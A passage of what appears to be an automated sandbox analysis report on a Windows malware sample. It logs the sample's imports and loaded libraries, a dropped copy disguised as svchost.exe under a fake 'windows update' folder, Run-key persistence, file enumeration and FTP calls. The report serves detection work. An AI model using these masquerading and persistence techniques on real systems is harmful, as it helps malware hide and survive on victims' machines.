eKey,WriteFile,CloseHandle,FreeResource,memset,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateProcessA,CreateWindowExA,ShowWindow,KiUserCallbackDispatcher,LoadAcceleratorsA,GetMessageA,KiUserCallbackDispatcher,TranslateAcceleratorA,TranslateAcceleratorA,TranslateMessage,DispatchMessageA,KiUserCallbackDispatcher,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,0_2_00921000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeFile created: C:\Users\user\AppData\Local\windows updateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCommand line argument: Move_V0_2_00921000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCommand line argument: MOVE_V0_2_00921000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCommand line argument: ID_V0_2_00921000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCommand line argument: 01Wu0_2_00921000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCommand line argument: "%s"0_2_00921000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCommand line argument: Move_V0_2_00921000
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCommand line argument: MOVE_V0_2_00921000
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeReversingLabs: Detection: 60%
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeProcess created: C:\Users\user\AppData\Local\windows update\svchost.exe "C:\Users\user\AppData\Local\windows update\svchost.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\windows update\svchost.exe "C:\Users\user\AppData\Local\windows update\svchost.exe"
Source: unknownProcess created: C:\Users\user\AppData\Local\windows update\svchost.exe "C:\Users\user\AppData\Local\windows update\svchost.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeProcess created: C:\Users\user\AppData\Local\windows update\svchost.exe "C:\Users\user\AppData\Local\windows update\svchost.exe"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\winapi\Move_V\Release\Move_V.pdb source: SecuriteInfo.com.FileRepMalware.7704.21109.exe
Source: Binary string: c:\winapi\Move_V\Release\Move_V.pdb] source: SecuriteInfo.com.FileRepMalware.7704.21109.exe
Source: Binary string: c:\winapi\V\Victim\Release\V.pdbaR source: SecuriteInfo.com.FileRepMalware.7704.21109.exe, svchost.exe.0.dr
Source: Binary string: c:\winapi\V\Victim\Release\V.pdb source: SecuriteInfo.com.FileRepMalware.7704.21109.exe, svchost.exe.0.dr
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCode function: 0_2_00921000 LoadStringA,LoadStringA,LoadStringA,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,GetUserNameA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateDirectoryA,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,RegCreateKeyA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,RegSetValueExA,RegCloseKey,WriteFile,CloseHandle,FreeResource,memset,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,CreateProcessA,CreateWindowExA,ShowWindow,KiUserCallbackDispatcher,LoadAcceleratorsA,GetMessageA,KiUserCallbackDispatcher,TranslateAcceleratorA,TranslateAcceleratorA,TranslateMessage,DispatchMessageA,KiUserCallbackDispatcher,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, C:\Users\%s\AppData\Local\windows update\svchost.exe0_2_00921000
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: real checksum: 0x2b5d4 should be: 0x2a3b7
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeCode function: 0_2_00921F49 push ecx; ret 0_2_00921F5C
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_0067524D push ecx; ret 1_2_00675260
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_0067524D push ecx; ret 4_2_00675260

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeFile created: C:\Users\user\AppData\Local\windows update\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeFile created: C:\Users\user\AppData\Local\windows update\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run windows updateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run windows updateJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006724F0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?1_2_006724F0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006725B9 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$bas1_2_006725B9
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00672687 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@s1_2